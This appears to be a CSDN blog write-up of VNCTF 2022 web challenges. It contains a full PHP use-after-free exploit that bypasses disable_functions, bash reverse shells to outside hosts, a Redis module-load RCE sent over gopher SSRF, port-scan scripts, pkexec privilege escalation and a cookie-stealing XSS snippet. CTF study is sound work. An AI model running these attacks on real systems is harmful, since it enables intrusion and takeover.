2021VNCTF

最新推荐文章于 2023-02-25 13:39:37 发布
最新推荐文章于 2023-02-25 13:39:37 发布
阅读量1k 收藏 1
点赞数
文章标签: javascript 原型模式 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/123078631
版权

文章目录

GameV4.0

image-20220212102026276

直接base64解码

newcalc0

源码

const express = require("express");
const path = require("path");
const vm2 = require("vm2");

const app = express();
app.use(express.urlencoded({ extended: true }));
app.use(express.json());

app.use(express.static("static"));

const vm = new vm2.NodeVM();

app.use("/eval", (req, res) => {
  const e = req.body.e;
  if (!e) {
    res.send("wrong?");
    return;
  }
  try {
    res.send(vm.run("module.exports="+e)?.toString() ?? "no");
  } catch (e) {
    console.log(e)
    res.send("wrong?");
  }
});

app.use("/flag", (req, res) => {
  if(Object.keys(Object.prototype).length > 0) {
    Object.keys(Object.prototype).forEach(k => delete Object.prototype[k]);
    res.send(process.env.FLAG);
  } else {
    res.send(Object.keys(Object.prototype));
  }
})

app.use("/source", (req, res) => {
  let p = req.query.path || "/src/index.js";
  p = path.join(path.resolve("."), path.resolve(p));
  console.log(p);
  res.sendFile(p);
});

app.use((err, req, res, next) => {
  console.log(err)
  res.redirect("index.html");
});

app.listen(process.env.PORT || 8888);

审计代码:

满足下面代码,就可以直接得到flag

if(Object.keys(Object.prototype).length > 0)

一般来说object.prototype都是null,length都为0

这个利用CVE-2022-21824

直接上payload

console.table([{a:1}],['__proto__'])

payload,就通过console.log使得Object.prototype[0]变成空字符,长度不为0

然后访问/flag,就可以得到flag。

gocalc0

非预期

就是抓包得cookie,然后base64解码(但是我复现的时候没成功)

预期

SSTI拿到源码

{{.}}

源码

package main
import (
	_ "embed"
	"fmt"
	"os"
	"reflect"
	"strings"
	"text/template"

	"github.com/gin-contrib/sessions"
	"github.com/gin-contrib/sessions/cookie"
	"github.com/gin-gonic/gin"
	"github.com/maja42/goval"
)

//go:embed template/index.html
var tpl string

//go:embed main.go
var source string

type Eval struct {
	E string `json:"e" form:"e" binding:"required"`
}

func (e Eval) Result() (string, error) {
	eval := goval.NewEvaluator()
	result, err := eval.Evaluate(e.E, nil, nil)
	if err != nil {
		return "", err
	}
	t := reflect.ValueOf(result).Type().Kind()

	if t == reflect.Int {
		return fmt.Sprintf("%d", result.(int)), nil
	} else if t == reflect.String {
		return result.(string), nil
	} else {
		return "", fmt.Errorf("not valid type")
	}
}

func (e Eval) String() string {
	res, err := e.Result()
	if err != nil {
		fmt.Println(err)
		res = "invalid"
	}
	return fmt.Sprintf("%s = %s", e.E, res)
}

func render(c *gin.Context) {
	session := sessions.Default(c)

	var his string

	if session.Get("history") == nil {
		his = ""
	} else {
		his = session.Get("history").(string)
	}

	fmt.Println(strings.ReplaceAll(tpl, "{{result}}", his))
	t, err := template.New("index").Parse(strings.ReplaceAll(tpl, "{{result}}", his))
	if err != nil {
		fmt.Println(err)
		c.String(500, "internal error")
		return
	}
	if err := t.Execute(c.Writer, map[string]string{
		"s0uR3e": source,
	}); err != nil {
		fmt.Println(err)
	}
}

func main() {
	port := os.Getenv("PORT")
	if port == "" {
		port = "8080"
	}

	r := gin.Default()
	store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e"))
	r.Use(sessions.Sessions("session", store))

	r.GET("/", func(c *gin.Context) {
		render(c)
	})

	r.GET("/flag", func(c *gin.Context) {
		session := sessions.Default(c)
		session.Set("FLAG", os.Getenv("FLAG"))
		session.Save()
		c.String(200, "flag is in your session")
	})

	r.POST("/", func(c *gin.Context) {
		session := sessions.Default(c)

		var his string

		if session.Get("history") == nil {
			his = ""
		} else {
			his = session.Get("history").(string)
		}

		eval := Eval{}
		if err := c.ShouldBind(&eval); err == nil {
			his = his + eval.String() + "

exp

package main

import (
	_ "embed"
	"fmt"
	"os"

	"github.com/gin-contrib/sessions"
	"github.com/gin-contrib/sessions/cookie"
	"github.com/gin-gonic/gin"
)

func main() {
	port := os.Getenv("PORT")
	if port == "" {
		port = "8088"
	}
	r := gin.Default()
	store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e"))
	r.Use(sessions.Sessions("session", store))
	r.GET("/flag", func(c *gin.Context) {
		session := sessions.Default(c)
		c.String(200, session.Get("FLAG").(string))
	})
	r.Run(fmt.Sprintf(":%s", port))
}

InterestingPHP

打开网页

image-20220222211753420

这个跟WMCTF的那个题比较相似。

利用eval发现phpinfo()被禁用了。

所以我们可以利用这个姿势(长知识了)

var_dump(get_cfg_var("disable_functions"));
var_dump(get_cfg_var("open_basedir"));
var_dump(ini_get_all());

可以发现存在disabled_function

image-20220222212159055

解法1:

直接尝试bybass

网上找的大佬的exp

fwrite 被禁了,改成 fputs

然后构造数据包,抓包,只需要在包后面加上

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj28zfvoWVxnHdp29
Content-Length: 6927

------WebKitFormBoundaryj28zfvoWVxnHdp29
Content-Disposition: form-data; name="1"

pwn("bash -c 'exec bash -i &>/dev/tcp/42.193.170.176/10000 <&1'");

function pwn($cmd) {
    define('LOGGING', false);
    define('CHUNK_DATA_SIZE', 0x60);
    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
    define('CMD', $cmd);
    for($i = 0; $i < 10; $i++) {
        $groom[] = Pwn::alloc(STRING_SIZE);
    }
    stream_filter_register('pwn_filter', 'Pwn');
    $fd = fopen('php://memory', 'w');
    stream_filter_append($fd,'pwn_filter');
    fputs($fd, 'x');
}

class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
    private $abc, $abc_addr;
    private $helper, $helper_addr, $helper_off;
    private $uafp, $hfp;

    public function filter($in, $out, &$consumed, $closing) {
        if($closing) return;
        stream_bucket_make_writeable($in);
        $this->filtername = Pwn::alloc(STRING_SIZE);
        fclose($this->stream);
        $this->go();
        return PSFS_PASS_ON;
    }

    private function go() {
        $this->abc = &$this->filtername;

        $this->make_uaf_obj();

        $this->helper = new Helper;
        $this->helper->b = function($x) {};

        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
        $this->log("helper @ 0x%x", $this->helper_addr);

        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
        $this->log("abc @ 0x%x", $this->abc_addr);

        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;

        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
        $this->log("helper handlers @ 0x%x", $helper_handlers);

        $this->prepare_leaker();

        $binary_leak = $this->read($helper_handlers + 8);
        $this->log("binary leak @ 0x%x", $binary_leak);
        $this->prepare_cleanup($binary_leak);

        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
        $this->log("real closure @ 0x%x", $closure_addr);

        $closure_ce = $this->read($closure_addr + 0x10);
        $this->log("closure class_entry @ 0x%x", $closure_ce);

        $basic_funcs = $this->get_basic_funcs($closure_ce);
        $this->log("basic_functions @ 0x%x", $basic_funcs);

        $zif_system = $this->get_system($basic_funcs);
        $this->log("zif_system @ 0x%x", $zif_system);

        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        $this->write($fake_closure_off + 0x38, 1, 4);

        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->write($fake_closure_off + $handler_offset, $zif_system);

        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
        $this->write($this->helper_off + 0x38, $fake_closure_addr);
        $this->log("fake closure @ 0x%x", $fake_closure_addr);

        $this->cleanup();
        ($this->helper->b)(CMD);
    }

    private function make_uaf_obj() {
        $this->uafp = fopen('php://memory', 'w');
        fputs($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
        for($i = 0; $i < STRING_SIZE; $i++) {
            fputs($this->uafp, "\x00");
        }
    }

    private function prepare_leaker() {
        $str_off = $this->helper_off + CHUNK_SIZE + 8;
        $this->write($str_off, 2);
        $this->write($str_off + 0x10, 6);

        $val_off = $this->helper_off + 0x48;
        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
        $this->write($val_off + 8, 0xA);
    }

    private function prepare_cleanup($binary_leak) {
        $ret_gadget = $binary_leak;
        do {
            --$ret_gadget;
        } while($this->read($ret_gadget, 1) !== 0xC3);
        $this->log("ret gadget = 0x%x", $ret_gadget);
        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
        $this->write(8, $ret_gadget);
    }

    private function read($addr, $n = 8) {
        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
        $value = strlen($this->helper->c);
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    private function write($p, $v, $n = 8) {
        for($i = 0; $i < $n; $i++) {
            $this->abc[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function get_basic_funcs($addr) {
        while(true) {
            // In rare instances the standard module might lie after the addr we're starting
            // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
            // In that case, changing the direction of the search should fix the crash.
            // $addr += 0x10;
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 &&
                in_array($this->read($addr + 4, 4),
                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) {
                    $this->log("standard module @ 0x%x", $addr);
                    return $this->read($addr + 0x28);
                }
            }
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) {
                return $this->read($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    private function cleanup() {
        $this->hfp = fopen('php://memory', 'w');
        fputs($this->hfp, pack('QQ', 0, $this->abc_addr));
        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
            fputs($this->hfp, "\x00");
        }
    }

    private function str2ptr($p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($this->abc[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $n = 8) {
        $out = '';
        for ($i = 0; $i < $n; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function log($format, $val = '') {
        if(LOGGING) {
            printf("{$format}\n", $val);
        }
    }

    static function alloc($size) {
        return str_shuffle(str_repeat('A', $size));
    }
}
?>

image-20220222212531056

发现有回显,直接反弹shell

bash -c 'exec bash -i &>/dev/tcp/VPN_IP/PORT <&1'

注意:pwn中一个要改成双引号

image-20220222212825072

image-20220222212900178

需要提权

find / -perm -u=s -type f 2>/dev/null

image-20220214141958345

发现可以1利用pkexec提权

image-20220222213057163

即可得到flag

解法2

知道了disabled_function,我们利用exp=print_r(scandir(./));可以获取目录

下载下来发现是一个redis的数据备份文件,猜测密码为ye_w4nt_a_gir1fri3nd

密码知道了,方式是SSRF打redis,但是还差个端口(测试端口不是6359)

直接利用dict探测端口,但是发现利用burp的方式不行,因为所有的返回都一样。

我们可以利用python(涨知识了)

import requests
from urllib import parse

url = "http://e029afc9-43c2-4a3d-9922-1d703aab43fd.node4.buuoj.cn:81/?exp=eval($_POST[0]);"
headers = {"content-type":"application/x-www-form-urlencoded"}

payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);
            curl_close($ch);
            if($result!=''){
            echo $result.$url;
            }
            
        } 
        for($i=0;$i<9999;$i++){
            Curl("dict://127.0.0.1:$i/info");
            }
        '''

data = {
    0:payload
}

r = requests.post(url,data=data,headers=headers).text
print(r)

扫到8888端口

还有一种扫端口的方式

<?php
highlight_file(__FILE__);
# Port scan
for($i=0;$i<65535;$i++) {
  $t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
  if($ee2 === "Address already in use") {
    var_dump($i);
  }
}


for($i=0;$i<65535;$i++) {
  $t=file_get_contents('http://127.0.0.1:'.$i);
  if(!strpos(error_get_last()['message'], "Connection refused")) {
    var_dump($i);
  }
}

直接传入

/?exp=eval(file_put_contents("a.php",base64_decode($_POST['a'])));
POST:
a=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwojIFBvcnQgc2Nhbgpmb3IoJGk9MDskaTw2NTUzNTskaSsrKSB7CiAgJHQ9c3RyZWFtX3NvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaWYoJGVlMiA9PT0gIkFkZHJlc3MgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9Cg==(为第一个代码的base64加密)

image-20220222215541833也可以得到8888端口

然后想,怎么打redis?

想到redis主从复制RCE,先利用file_put_contents写so文件

由于file_get_contents被ban,使用curl访问外网来加载so文件

import requests

url = "http://8ec6d21f-173b-438e-a82c-e63de72956ab.node4.buuoj.cn:81/?exp=eval($_POST[0]);"
headers = {"content-type": "application/x-www-form-urlencoded"}
pay = "http://ip/exp.so"
payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);
            curl_close($ch);
            file_put_contents("exp.so",$result);
      }

      Curl("''' + pay + '''");
'''.strip()

data = {
    0: payload
}
r = requests.post(url, data, headers=headers).text
print(r)

然后发弹shell

import requests
from urllib import parse


url = "http://e029afc9-43c2-4a3d-9922-1d703aab43fd.node4.buuoj.cn:81/?exp=eval($_POST[0]);"
headers = {"content-type":"application/x-www-form-urlencoded"}

pay="""auth ye_w4nt_a_gir1fri3nd
module load ./ex.so
system.exec 'bash -c "bash -i >& /dev/tcp/ip/7777 0>&1"'
quit
""".replace('\n','\r\n')

payload = '''
      function Curl($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
            $result = curl_exec($ch);
            curl_close($ch);
            if($result!=''){
            echo $result;
            }
            
        } 
        Curl("gopher://127.0.0.1:8888/_'''+parse.quote(pay)+'''");
        '''

data = {
    0:payload
}

r = requests.post(url,data=data,headers=headers).text
print(r)

也可以这么写

import base64
import requests

url = "http://8ec6d21f-173b-438e-a82c-e63de72956ab.node4.buuoj.cn:81/?exp=eval(base64_decode($_POST[0]));"
payload = '''
        $redis = new Redis();
        $redis->connect('127.0.0.1',8888);
        $redis->auth('ye_w4nt_a_gir1fri3nd');
        $redis->rawCommand('module','load','/var/www/html/exp.so');
        $redis->rawCommand("system.exec","bash -c 'exec bash -i &>/dev/tcp/ip/39543 <&1'");
'''
payload=base64.b64encode(payload.encode(encoding="utf-8"))
data = {
    0: payload
}
r = requests.post(url, data=data).text
print(r)

后面提权就是一样的了。

参考文章:

https://blog.csdn.net/cosmoslin/article/details/122930836?spm=1001.2014.3001.5502

Z3eyOnd
关注
VNCTF 2021
煤矿路口西的博客
03-24 868
冰冰好像藏着秘密 发现冰冰藏着的flag,flag格式为VNCTF{*} 得到FFT.rar 但是直接打开会提示 这个存在一个考察的点:rar伪加密 但是在实战中笔者发现两个绕过的方法 1)用kali打开 2)如上图图一所示,在winrar报错的情况下,直接拖出FFT.png,也能达到解压的效果 而按出题人本身的意思,是在使用010打开的情况下: 把下图的84改成80 通过搜索得知文件名FFT为: 下面是大佬脚本: import cv2 as cv import numpy as np imp.
[VNCTF 2021]Ez_game
missht0的博客
03-26 439
一个还不错的打怪小游戏 解法一 可以在控制台里修改游戏数据 然后就能轻松打过十关了 解法二 源码里面有一段 sojson.v4加密的代码 放在在线工具里解码,就可以找到flag
[VNCTF 2021]naive
Y4tacker的博客
03-15 2575
[VNCTF 2021]naive 拿了一个二血开心 亮点 nodeJs的ES6特性import及其动态加载特性 Wp 首先打开题目是一个计算器,以为是常规的审计Node去实现逃逸啥的,后来发现不是 在源代码当中发现,存在任意文件读取,先放一边 app.use("/source", (req, res) => { let p = req.query.path || file; p = path.resolve(path.dirname(file), p); if (p.includes("
[VNCTF 2021] notsudoku wp
liuxiaohuai_的博客
03-22 486
这个题目之前比赛写的时候就是一脸懵。比赛之后看了大神们的wp才知道还是我太弱了,学习的太少了。 1.查壳 下载附件后先查壳。 发现带有upx壳,我么先脱壳。 2.将python打包的exe文件转化为pyc文件 通过观察文件图标可以发现,这个文件是使用python打包的一个exe文件我们需要使用pyinstxtractor.py将python打包的.exe文件还原成.py文件 python pyinstxtractor.py notsudoku.exe //注意:要将被还原文件和 pyinstxtrac
vnctf2021 web复现
weixin_50597969的博客
04-04 405
vnctf2021 web复现Ez_game 由于本人是个大菜鸡,比赛就签了个到,尝试来复现一下,对应题目在buu上[传送门] Ez_game 解法一:在控制台中输入 winTimer["endTime"]=99 解法二: 发现game.js中有这部分可疑字符串 是sojson.v4加密,在线解密传送门 可以在线解密也可以直接在控制台里边跑 flag flag{this_game_is_funny!} 想玩出来的话,我记得flag好像是在第10关,可以直接修改cookie进入第10关,我t
[VNCTF] EasyJava
Landasika的博客
05-17 418
目录 [VNCTF] EasyJava一、拿到源码二、分析源码三、Servlet的线程安全问题:条件竞争四、构造反序列化 [VNCTF] EasyJava 一、拿到源码 首先拿到题目,查看源码发现了提示:/file? 进入/file文件发现需要提交一个url。由于前面提示用file进入,这个时候我们可以尝试用文件读取。 输入 ?url=file:/// 之后显示发现有一个flag,但是...
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3
arttnba3的博客
04-05 1028
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca
VNCTF-ezmath
ookami6497的博客
02-28 460
import hashlib #包含库 from pwn import * import string #context(arch = 'i386',os = 'linux') r = remote('node4.buuoj.cn',28620) #连接 t = r.recvline() print(r.recv()) a = str(t[16:32],'utf-8') s = str(t[37:-1],'utf-8') x = '' print("t = ",t) print("a = ",a) pr
VNCTF2022 web wp
m0_67403240的博客
03-01 1095
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 非预期 xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把s
VNCTF 公开赛 2021 factor
blog
03-14 1424
[VNCTF 2021] factor task.py from Crypto.Util.number import * from gmpy2 import * from secret import flag from icecream import * # flag = b'SYC{123123123123123}' def get_public_key(d): while 1: p, q = getPrime(512), getPrime(512) N, phi,
vnctf——babyvm
weixin_52369224的博客
02-17 3392
深入了解 vm虚拟机逆向 这是一道golang vm题,64位idapro 7.7 对于go反编译进行了优化,可以直接看。 分析主函数,unk_B9D8A0为我们的opcode段 根据部分函数 猜测a7就是虚拟机的寄存器个数,并且为21. 推测栈的大小为0x3e8 struct func { void *call; vm *ptr; }; struct REG { _DWORD R[21]; }; struct vm { REG reg; _DWORD Memor
vnctf easy_java
weixin_53747083的博客
03-11 4344
前段时间小编参加了vnctf并怀疑人生了 (因为我不会java),但我在比赛复现后询问了大佬,再次审计代码,这两天捋顺了思路,这里写下我的解题过程进入页面,是这么一个页面 zh
VNCTF2021 部分题目复现
volcano的博客
03-18 2740
VNCTF2021Web[VNCTF 2021]Ez_gameMisc冰冰好像藏着秘密interesting_fishing Web [VNCTF 2021]Ez_game 很魔性的一个小游戏,查看源码看到三个js文件,主要审game.js 我的想法是在控制台执行代码,改人物的参数,暴力通关 看到如下代码,很明显是人物的初始数值,从上到下分别对应血量、血量上限、小回旋镖数量、大回旋镖数量、金币数量 在控制台小改一波,然后快乐玩耍 之后看到mumuzi师傅(套神)提供了一种更快捷的思路,发现判定玩家胜利
VNCTF2023 WP
最新发布
qq_74710163的博客
02-25 446
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
VNCTF2022公开赛
shinygod的博客
03-15 440
gocalc0 00x1预期解 点击 把session拿去解码一下(末尾有==base64解码一下) 两次编码就出来了(本来我以为) 00x2非预期解 import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi
VNCTF 2022 web
qq_53263789的博客
02-16 1691
前言 复现一下vnctf GameV4.0 签到 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json()); app.use(express.static("s
VNCTF-reverse-BabyMaze(复现)
ookami6497的博客
03-20 617
pyc花指令 生成的文件也是0字节,一般至少都能生成点东西出来的,但是这个一点都没有,当时猜估计是有个循环啥的,然后就不会写了 根据wp来复现一下,先查看字节码 import marshal, dis f = open("BabyMaze.pyc", "rb").read() code = marshal.loads(f[16:]) #这边从16位开始取因为是python3 python2从8位开始取 dis.d..
VNCTF2021 MISC wp
七月的博客
03-15 1912
冰冰好像藏着秘密
VNCTF(web)小白详解
anwen12的博客
03-23 1229
VNCTF(web)小白详解 看了下师傅们的wp,发现还挺难理解的。下面跟着大家做个简单的解答。 0x01 realezjvav 一上来就是常规的登录框,估摸着就是sql注入,paylod一拿到,一打,欸,不错,笛卡尔乘积盲注(原理:多个数据表链接的时候,数据大了,所以时间长)拿到密码no_0ne_kn0w_th1s 然后是这个,看不出来,我们继续。 发现这个就是我们fastjson,rce了。 https://github.com/welk1n/JNDI-Injection-Exploit/blob/
vnctf2023 部分
weixin_57439582的博客
02-24 218
vnctf2023
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值